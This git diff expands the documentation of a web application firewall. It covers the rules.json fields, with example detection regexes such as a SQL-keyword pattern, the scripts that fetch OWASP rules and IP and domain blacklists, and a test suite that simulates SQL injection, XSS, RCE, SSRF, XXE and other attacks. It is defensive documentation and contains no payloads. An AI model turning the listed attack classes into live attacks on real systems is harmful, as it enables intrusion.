* `4`: *Response Body* (applied *after* response headers have been written). The phase determines *when* the rule is evaluated. | `1`, `2`, `3`, `4` | +| **`pattern`** | **Regular Expression:** A string containing a regular expression that defines the pattern to match against the defined `targets`. The pattern must be a valid regex understood by the configured engine. Case-insensitive matching can be achieved by starting the pattern with `(?i)`. It is highly recommended to ensure the regex is performant. | `(?i)(?:select|insert|update)`, `(?i)\d{3}-\d{2}-\d{4}`, `(?:[a-zA-Z0-9_.-]+@[a-zA-Z0-9-]+.[a-zA-Z0-9-.]+)` | +| **`targets`** | **Inspection Targets:** An array of strings that specifies the parts of the request or response to inspect for a match. The possible targets are: * `URI`: The full URI of the request. * `ARGS`: The query string parameters (if any). * `BODY`: The body of the request. * `HEADERS`: All request headers are checked. * `COOKIES`: All request cookies. * `HEADERS:`: Specifically checks the value of the given header name (e.g., `HEADERS:User-Agent`, `HEADERS:X-Forwarded-For`). Header names should be case-insensitive. * `COOKIES:`: Specifically checks the value of the specified cookie (e.g., `COOKIES:sessionid`). Cookie names should be case-insensitive. * `RESPONSE_HEADERS`: All response headers are checked. * `RESPONSE_BODY`: The full response body. * `RESPONSE_HEADERS:`: Specifically checks the value of the given response header. The header name is case-insensitive. The `targets` array determines *where* the rule looks for matches. | `["ARGS", "BODY"]`, `["HEADERS:X-Custom-Header"]`, `["URI"]`, `["COOKIES:sessionid"]`, `["RESPONSE_HEADERS:Content-Type"]` | +| **`severity`** | **Severity Level:** A string representing the severity of the rule violation (`CRITICAL`, `HIGH`, `MEDIUM`, `LOW`). This is used for logging, metrics, and reporting, but does not directly impact the processing of the request, or if the rule is enabled or not. 
You can use these labels to prioritize analysis, filtering and alerting. | `CRITICAL`, `HIGH`, `MEDIUM`, `LOW` | +| **`action`** | **Action on Match:** A string specifying the action to take when a rule is matched. The currently supported actions are: * `block`: The request or response is blocked, and the processing of the request/response chain is terminated. * `log`: The rule match is logged, but the processing of the request/response continues normally. If this field is empty, or is set to any invalid value, it defaults to `block`. | `block`, `log` | +| **`score`** | **Anomaly Score:** An integer representing a numerical score added to an internal anomaly score counter when a rule matches. The score is used in conjunction with other rules to indicate the severity of the event. It is typically used to decide when an overall threshold has been reached. A higher score generally means a more severe attack. This score can be used for threshold-based blocking or other aggregation mechanisms in a broader system. | `5`, `10`, `1`, `3` | +| **`description`**| **Rule Description:** A string providing a human-readable description of the rule. It should explain what the rule is designed to detect. This description is useful for rule management, audits, and troubleshooting. | `Detect SQL injection attempts`, `Block access to admin pages`, `Detect XSS in request` | + +### Key Considerations: + +* **Rule Order:** The order of rules in `rules.json` can sometimes be significant, particularly with respect to how the WAF operates with regards to short-circuiting the rule chain after a match. In some WAF implementations, when a rule with action `block` is matched then the request is blocked and no further rules are processed. In other implementations, even if a `block` action is triggered, the rules may continue to execute but the original response will not change. +* **Regular Expression Performance:** Complex regular expressions can have a significant impact on WAF performance. 
 Ensure the patterns are efficient and avoid complex backtracking if performance becomes an issue. +* **False Positives:** Rules must be carefully crafted to minimize false positives. Thoroughly test and validate rules with a wide range of requests to ensure proper operation. +* **Testing:** Maintain a testing strategy that covers both attack requests (which should match) and legitimate requests (which should not), so that you can confirm the rules work correctly and produce no false positives. +* **Rule Updates:** Regularly update rules based on new vulnerabilities and attack patterns. +* **Data Validation:** Ensure that the JSON is valid and that all fields are correctly formatted as expected. +* **Case sensitivity:** Regex patterns are case sensitive unless they are specifically marked as insensitive (e.g., `(?i)`). Header and cookie names in the `targets` field are not case sensitive. + +By using the `rules.json` format correctly and understanding the meaning of each rule field, you can create a robust and effective WAF configuration that provides strong protection against a wide range of web application attacks. This structured format enables granular control over the rules, allowing administrators to fine-tune the system for their specific environment and security needs. diff --git a/docs/scripts.md b/docs/scripts.md index cc82a4c..f3946a9 100644 --- a/docs/scripts.md +++ b/docs/scripts.md @@ -1,52 +1,139 @@ -# 🐍 Rule/Blacklist Population Scripts +# 🐍 Rule/Blacklists Population Scripts -Scripts to generate/download rules and blacklists: +To facilitate the management and population of rules and blacklists for the WAF, a set of Python scripts is provided. They automate fetching, converting, and downloading rules and blacklists from various external sources, which simplifies keeping the WAF up to date with the latest threat intelligence. 
-## `get_owasp_rules.py` +Here's a detailed explanation of each script and its purpose: -* Fetches OWASP core rules and converts them to the required JSON format. +## `get_owasp_rules.py` -```bash -python3 get_owasp_rules.py -``` +* **Purpose:** This script is designed to fetch and process the OWASP Core Rule Set (CRS), which provides a foundation for general web application security. It fetches the rules, parses them, and converts them to the JSON format required by the WAF (`rules.json`). +* **Functionality:** + * The script downloads the latest version of the OWASP CRS. + * It extracts relevant rules and their metadata. + * It converts the rules to the WAF's JSON format. + * It saves the converted rules into the `rules.json` file. +* **Usage:** + + ```bash + python3 get_owasp_rules.py + ``` + +* **Considerations:** + * Ensure you have the necessary Python libraries installed (you can install them via `pip install requests`, or using `requirements.txt` if the repository has one) + * The OWASP CRS is a large ruleset, so the script may take some time to execute. + * The script will not override any custom rules you have on your configuration. + * The script is configured to obtain OWASP rules from a specific source, you may need to check the script if that source changes. + * You may want to customize or filter the rules that are loaded from OWASP in order to reduce the number of rules being processed by your WAF. ## `get_blacklisted_ip.py` -* Downloads IPs from several external sources. - -```bash -python3 get_blacklisted_ip.py -``` +* **Purpose:** This script downloads IP addresses from multiple external sources of known malicious IPs. The script combines them and converts them into a plain text format suitable for the WAF's `ip_blacklist.txt` file. +* **Functionality:** + * The script retrieves IP lists from various open-source threat intelligence feeds. + * It processes and combines these lists into a single list, removing duplicates and invalid entries. 
+ * It saves the blacklisted IPs in the `ip_blacklist.txt` file, one IP address or CIDR block per line. +* **Usage:** + + ```bash + python3 get_blacklisted_ip.py + ``` +* **Considerations:** + * The script requires an active internet connection to download lists from external sources. + * The script combines multiple threat feeds, it is recommended to review the sources to make sure that you trust those lists. + * The script might be slow depending on the number of IPs that need to be processed and downloaded. + * You may want to review and filter the IP lists before loading them into your WAF, to avoid blocking legitimate traffic. + * The script is configured to obtain IP address lists from specific sources, you may need to check the script if any of the sources change. ## `get_blacklisted_dns.py` -* Downloads blacklisted domains from various sources. - -```bash -python3 get_blacklisted_dns.py -``` +* **Purpose:** This script downloads blacklisted domain names from several open-source threat intelligence feeds, creating the `dns_blacklist.txt` file. +* **Functionality:** + * The script fetches domain name lists from various threat intelligence feeds. + * It merges and removes duplicates from the fetched lists. + * It converts the domain names to lowercase and saves them into the `dns_blacklist.txt` file, one domain name per line. +* **Usage:** + + ```bash + python3 get_blacklisted_dns.py + ``` +* **Considerations:** + * The script requires an active internet connection to retrieve lists from external sources. + * The script combines multiple threat feeds, it is recommended to review the sources to make sure that you trust those lists. + * You may want to review and filter the domain lists before loading them into your WAF, to avoid blocking legitimate traffic. + * The script is configured to obtain domain lists from specific sources, you may need to check the script if any of the sources change. ## `get_spiderlabs_rules.py` -* Downloads rules from SpiderLabs. 
+* **Purpose:** This script retrieves rules from the SpiderLabs repository, which provides a collection of security rules developed by Trustwave SpiderLabs. +* **Functionality:** + * The script downloads the latest version of the SpiderLabs rules. + * It parses the rules and converts them into the WAF's JSON rule format. + * It saves the converted rules into the `rules.json` file. +* **Usage:** -```bash -python3 get_spiderlabs_rules.py -``` + ```bash + python3 get_spiderlabs_rules.py + ``` -## `get_vulnerability_rules.py` +* **Considerations:** + * Ensure you have the necessary Python libraries installed (you can install them via `pip install requests`, or using `requirements.txt` if the repository has one). + * The script requires an active internet connection to download rules. + * The rules may contain configurations not compatible with your setup. + * You may want to customize or filter the rules that are loaded from SpiderLabs to reduce the number of rules being processed. + * The script is configured to obtain SpiderLabs rules from a specific source, you may need to check the script if that source changes. -* Downloads rules related to known vulnerabilities. +## `get_vulnerability_rules.py` -```bash -python3 get_vulnerability_rules.py -``` +* **Purpose:** This script downloads rules related to specific known vulnerabilities. These rules are usually designed to protect against the exploitation of well-known flaws in software and web applications. +* **Functionality:** + * The script fetches rules from a source that is providing rules about known vulnerabilities (CVEs). + * It parses the rules and converts them to JSON. + * The rules are added to the `rules.json` file. +* **Usage:** -## `get_caddy_feeds.py` + ```bash + python3 get_vulnerability_rules.py + ``` -* Downloads pre-generated blacklists and rules from [this repository](https://github.com/fabriziosalmi/caddy-feeds/) to be used by the WAF. 
+* **Considerations:** + * Ensure you have the necessary Python libraries installed. + * The script requires an active internet connection. + * The effectiveness of the rules depends on the quality and timeliness of the vulnerability information. + * The script is configured to obtain vulnerability rules from a specific source, you may need to check the script if that source changes. + * You may want to customize or filter the rules that are loaded for known vulnerabilities to reduce the number of rules being processed or if you have patched that specific vulnerability. -```bash -python3 get_caddy_feeds.py -``` +## `get_caddy_feeds.py` +* **Purpose:** This script downloads pre-generated blacklists and rules from a specific repository, offering a convenient way to keep rules and blacklists up to date with community-driven content, from this repository. +* **Functionality:** + * The script fetches pre-generated JSON rules, blacklists and other feeds from a specific GitHub repository. + * It saves the downloaded files to the appropriate locations so that they can be used by the WAF. +* **Usage:** + + ```bash + python3 get_caddy_feeds.py + ``` +* **Considerations:** + * The script requires an active internet connection to download files from the repository. + * The repository is external, so you should trust the source before including the rules and blacklists. + * You may want to review and filter the files before using them, to avoid including unwanted content. + * The script is configured to obtain rules and blacklists from a specific repository, you may need to check the script if that source changes. + +## General Considerations for all scripts: + +* **Dependencies:** Ensure that you have all the required Python libraries installed (e.g., `requests`, `json`, and others). You can often install the required dependencies using `pip install -r requirements.txt` or `pip install `. 
+* **Internet Connection:** All scripts require an active internet connection to download resources from external locations. +* **File Paths:** The scripts may have hardcoded paths for the output files; check that they match your setup. +* **Trust Sources:** Always verify the trustworthiness of the sources used by the scripts before downloading data. +* **Customization:** You can modify these scripts to better fit your specific needs, for example by: + * Adding new sources of rules and blacklists. + * Customizing the downloaded data before converting it to a specific format. + * Filtering out specific entries that may not be relevant for your application. +* **Scheduling:** It is recommended to automate the execution of these scripts to regularly fetch updated threat intelligence feeds. This requires a scheduler such as `cron` or a similar system. +* **Combining scripts:** These scripts can be combined into a single script or scheduled via `cron` to update rules and blacklists automatically. +* **Rate Limiting:** Be aware that if you execute these scripts too often from the same IP address, you might be rate limited by the source that serves the lists. +* **Testing:** Test the rules and blacklists after you obtain them to make sure they are working correctly and that there are no false positives. +* **Maintenance:** These scripts require periodic maintenance whenever any of the sources they consume are moved, removed, or changed. +* **Review:** Review the data obtained by these scripts before loading it into production, to ensure it does not have unwanted effects. + +These scripts provide a powerful set of tools to streamline the management of WAF rules and blacklists. By using them regularly, you can maintain a strong security posture and protect your applications from various threats. Remember to adapt the scripts to meet your specific needs and environment. 
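The merge step described above for `get_blacklisted_ip.py` (combine several feeds, drop duplicates and invalid entries, keep one IP address or CIDR block per line) could look roughly like the sketch below. It is not taken from the script itself: the function name `merge_ip_lists` and the sample feeds are hypothetical, and treating `#` as a comment marker is an assumption about the feed format.

```python
import ipaddress
from typing import Iterable, List


def merge_ip_lists(feeds: Iterable[Iterable[str]]) -> List[str]:
    """Combine feeds into a deduplicated list of valid IPs and CIDR blocks."""
    seen = set()
    merged = []
    for feed in feeds:
        for raw in feed:
            # Assumption: anything after '#' is a comment.
            entry = raw.split("#", 1)[0].strip()
            if not entry:
                continue
            try:
                # strict=False accepts CIDRs with host bits set, e.g. 10.0.0.1/8.
                network = ipaddress.ip_network(entry, strict=False)
            except ValueError:
                continue  # skip entries that are not valid IPs or CIDR blocks
            # Write single hosts as plain addresses and ranges in CIDR notation.
            if network.num_addresses == 1:
                text = str(network.network_address)
            else:
                text = str(network)
            if text not in seen:
                seen.add(text)
                merged.append(text)
    return merged


# Hypothetical feeds using documentation-reserved address ranges.
feed_a = ["192.0.2.1", "198.51.100.0/24", "# comment line", "not-an-ip"]
feed_b = ["192.0.2.1", "203.0.113.7  # scanner", ""]

result = merge_ip_lists([feed_a, feed_b])
print("\n".join(result))  # one IP address or CIDR block per line
```

Normalizing every entry through `ipaddress` before deduplicating means that `192.0.2.1` and `192.0.2.1/32` collapse into a single line, which keeps the resulting blacklist small.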
diff --git a/docs/testing.md b/docs/testing.md index 60d72be..4fff331 100644 --- a/docs/testing.md +++ b/docs/testing.md @@ -1,31 +1,102 @@ # 🧪 Testing -## Basic Testing +The `test.py` script provides a comprehensive security testing suite designed to verify the effectiveness of the configured WAF rules. This script goes beyond basic checks and simulates a wide range of attack scenarios across various attack vectors. It provides detailed logging and a summary of the test results, allowing you to fine-tune your WAF rules and settings. -The included `test.sh` script sends a series of `curl` requests to test various attack scenarios: +## Purpose -```bash -./test.sh - ``` +The primary purpose of the `test.py` script is to: -## Load Testing +* **Automated Security Checks:** Provide an automated way to test the WAF against a broad range of attack scenarios, ensuring consistent and repeatable testing. +* **Rule Validation:** Verify the WAF rules are correctly configured and functioning as expected by simulating a wide range of attacks. +* **Detailed Logging:** Generate detailed logs of each test case, including the request details, response codes, and whether each test passed or failed. +* **Performance Tracking:** Track the number of passed and failed tests over time, so you can verify that changes to the WAF or its rules do not break expected behavior. +* **Identify Weaknesses:** Help identify specific areas where the WAF might be weak or have misconfigured rules so that they can be fixed accordingly. -Use a tool like `ab` to perform load testing: +## Functionality -```bash -ab -n 1000 -c 100 http://localhost:8080/ -``` +The `test.py` script works by: -## Security Testing Suite +1. **Defining Test Cases:** Each test case consists of: + * A descriptive name (`description`). + * A target URL (`url`). + * An expected HTTP response code (`expected_code`). + * Optional headers (`headers`). 
+ * Optional request body (`body`). + * Optional category name, to help in organizing the output +2. **Sending Requests:** The script uses `curl` to send HTTP requests with the specified parameters. +3. **Response Verification:** After sending a request, it checks the HTTP response code and determines if it matches the expected value. +4. **Detailed Logging:** All test results are written to a log file (`waf_test_results.log`), including the test description, URL, headers, body, the expected code, and the actual response received. The log file is also categorized according to the test type. +5. **Test Summary:** At the end of the test run, a summary is printed to the console, which includes: + * The total number of tests. + * The number of tests that passed. + * The number of tests that failed. + * A message indicating if the test suite passed, or failed, depending on the number of failures. +6. **Color-Coded Output:** The output is color-coded to provide quick visual feedback. + * Green indicates a successful test. + * Red indicates a failed test or errors during the test. + * Blue indicates a general information or header of the test execution. + * Yellow indicates generic messages -The `test.py` script provides a comprehensive check to verify the effectiveness of the configured WAF rules. +## How to Run the Script -* Each test case will result in either a pass or a fail, based on the rules configured in the WAF. -* The output log contains detailed results for each test case, along with a summary of all tests performed. -* An overall percentage is reported at the end, and if the percentage is below 90%, it's recommended to review the output log for further analysis of the failing tests. -* The security testing suite will test SQL Injection, XSS, Path Traversal, RCE, and much more. You can find a list of tested attacks in the `test.py` script. -* To run the security testing suite: +1. **Ensure Python 3 is installed:** The script requires Python 3 to execute. +2. 
**Run the script:** + ```bash + python3 test.py + ``` +3. **Analyze the Output:** + * Review the console output for the overall test results. + * Examine the `waf_test_results.log` file for detailed information about each test case. + +## Script Usage ```bash -python3 test.py +python3 test.py --user-agent "My Custom User Agent" ``` + +* **`--user-agent` or `-ua`:** An optional argument to set a custom User-Agent string for all the tests. + +## Test Case Examples + +The `test_cases` list contains a wide variety of tests, each designed to simulate a particular vulnerability or attack vector. + +* **SQL Injection:** Multiple levels of SQL injection attempts including basic syntax, comment bypasses, union injections, and more. It also tests SQL injection via HTTP headers and cookies. +* **Cross-Site Scripting (XSS):** A large number of XSS attempts using script tags, image tags, event handlers, JavaScript URLs, URL-encoded and other obfuscated payloads. The tests include XSS payloads in GET parameters, cookies, headers and body. +* **Remote Code Execution (RCE):** Tests for command injection using various techniques including the `cmd` parameter, shell commands, backticks, and other common payloads used in RCE attacks. RCE is also tested via HTTP headers and cookies. +* **Path Traversal:** Tests multiple variations of path traversal using double dots, triple dots, URL-encoded path traversals, Unicode encoding, and other obfuscation techniques. Path traversal is also tested using headers and cookies. +* **Header Injection:** Various header injection techniques are tested, such as X-Forwarded-For injection, Host header manipulation, Content-Type injection, and more. +* **Protocol Attacks:** Checks for exposure of configuration files, version control directories, and sensitive system files, using different path variations. +* **Scanner Detection:** Simulates requests from various vulnerability scanners to verify that they are properly blocked.
+* **Insecure Deserialization:** Tests Java, Python, and PHP deserialization vulnerabilities by sending serialized data. It includes tests via URL parameters, headers and cookies. +* **Server-Side Request Forgery (SSRF):** Simulates SSRF attacks using a variety of protocols, IP addresses and techniques. SSRF is also tested via headers and cookies. +* **XML External Entity (XXE):** Tests XXE vulnerabilities using both inline and external entities, with and without parameter entities. XXE is tested via URL parameters, headers and body. +* **HTTP Request Smuggling:** Tests several HTTP request smuggling scenarios using different header combinations and checks how the WAF handles them. It includes tests via headers, body, and the main URL. +* **HTTP Response Splitting:** Tests how the WAF prevents HTTP response splitting attacks via GET parameters, headers and cookies, using different techniques such as newlines and CRLF. +* **Insecure Direct Object Reference (IDOR):** Tests several variations of IDOR attacks using different paths and numeric and alphanumeric identifiers. +* **Clickjacking:** Tests whether the WAF properly blocks clickjacking attacks by injecting an `iframe` and checking whether the WAF prevents rendering of the tested page in a frame. It includes tests with `object`, `embed`, `form`, `base`, `iframe` tags. +* **Cross-Site Request Forgery (CSRF):** Checks whether the WAF has proper protection against CSRF attacks, including via GET, POST, different content types, and various other parameters. +* **Server-Side Template Injection (SSTI):** Tests how the WAF prevents SSTI attacks by sending expressions that should be evaluated by the template engine. SSTI is tested via URL parameters and headers. +* **Mass Assignment:** Tests for mass assignment attacks via a variety of techniques, such as sending a JSON payload that attempts to modify protected attributes. +* **NoSQL Injection:** Tests for common NoSQL injection payloads, specifically for MongoDB.
+* **XPath Injection:** Tests the effectiveness of the XPath injection protection with different payloads, including wildcards and XPath functions. +* **LDAP Injection:** Tests a variety of LDAP payloads including bypasses, wildcards and common LDAP filters. +* **XML Injection:** Tests for XML injection vulnerabilities by sending malformed XML content and checking whether it is properly filtered. This test differs from the XXE test in that it covers other XML injection techniques. +* **File Upload:** Tests file upload vulnerabilities by sending a variety of malicious file types, including PHP, shell scripts, images with PHP code, and more. +* **JWT Attacks:** Tests various JWT attack scenarios by modifying the JWT algorithm, header, payload, and signature, and by testing some well-known exploits. +* **GraphQL Injection:** Tests the protection against GraphQL injection by sending introspection queries, complex mutations, and other GraphQL attacks. +* **Valid Requests:** Includes tests that should pass, to verify that the WAF does not introduce false positives and works correctly with valid requests. + +## Best Practices + +* **Regular Testing:** Run the `test.py` script regularly, especially after modifying rules or blacklists. +* **Custom Test Cases:** Add new test cases to the `test_cases` list to test vulnerabilities or requirements specific to your system. +* **Review Logs:** Review the `waf_test_results.log` file to identify failed tests and understand what the issue might be. +* **Customize Rules:** Adjust your WAF rules based on the test results to achieve the desired level of protection. +* **Dynamic Analysis:** In addition to running the automated test suite, perform manual security testing by interacting with your application and analyzing the behavior of the WAF in real time. +* **Integration with CI/CD:** Integrate the testing suite with your CI/CD pipelines to automate security testing as part of your software delivery process.
+* **Real-World Scenarios:** Consider testing your rules against real-world attack scenarios using penetration testing tools. +* **Performance Testing:** The `test.py` script is not designed for performance testing. Combine it with load testing, using tools such as `ab`, to ensure your WAF performs correctly under high load. + +## Conclusion + +The `test.py` script is a comprehensive tool for security testing, allowing you to validate your WAF's effectiveness and identify potential vulnerabilities. By carefully analyzing the logs and output from this script, you can fine-tune your WAF configurations and rules, ensuring a high level of security for your web applications. Understanding how to interpret the results from this test suite is critical to confirming that the WAF is working correctly and preventing potential attacks.
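
The flow described under Functionality (define a test case, send it with `curl`, compare the response code, summarize) can be sketched roughly as follows. This is a minimal illustration and not the actual `test.py` code: the helper names `build_curl_command`, `run_case`, and `summarize`, the choice of `curl` flags, and the sample URL are assumptions. Only the test case fields (`description`, `url`, `expected_code`, `headers`, `body`) come from the documentation.

```python
import subprocess


def build_curl_command(case, user_agent=None):
    """Build a curl argument list for one test case (hypothetical helper)."""
    # -s: silent, -o /dev/null: discard the body, -w: print only the status code
    cmd = ["curl", "-s", "-o", "/dev/null", "-w", "%{http_code}"]
    for name, value in case.get("headers", {}).items():
        cmd += ["-H", f"{name}: {value}"]
    if user_agent:
        cmd += ["-A", user_agent]
    if case.get("body") is not None:
        # --data makes curl send a POST request with this body
        cmd += ["--data", case["body"]]
    cmd.append(case["url"])
    return cmd


def run_case(case, runner=subprocess.run):
    """Send the request and compare the status code with the expected one."""
    result = runner(build_curl_command(case), capture_output=True, text=True)
    actual = result.stdout.strip()
    return actual == str(case["expected_code"]), actual


def summarize(outcomes):
    """Count passed and failed tests from a list of booleans."""
    passed = sum(1 for ok in outcomes if ok)
    return {"total": len(outcomes), "passed": passed, "failed": len(outcomes) - passed}


# Example test case; the URL and payload are placeholders.
example_case = {
    "description": "Basic SQL injection in a query parameter",
    "url": "http://localhost:8080/?id=1%27%20OR%20%271%27=%271",
    "expected_code": 403,
    "headers": {"X-Test": "1"},
}
```

Calling `run_case(example_case)` against a running WAF instance would return a `(passed, actual_code)` pair; the `runner` parameter exists only so the request step can be replaced in unit tests without network access.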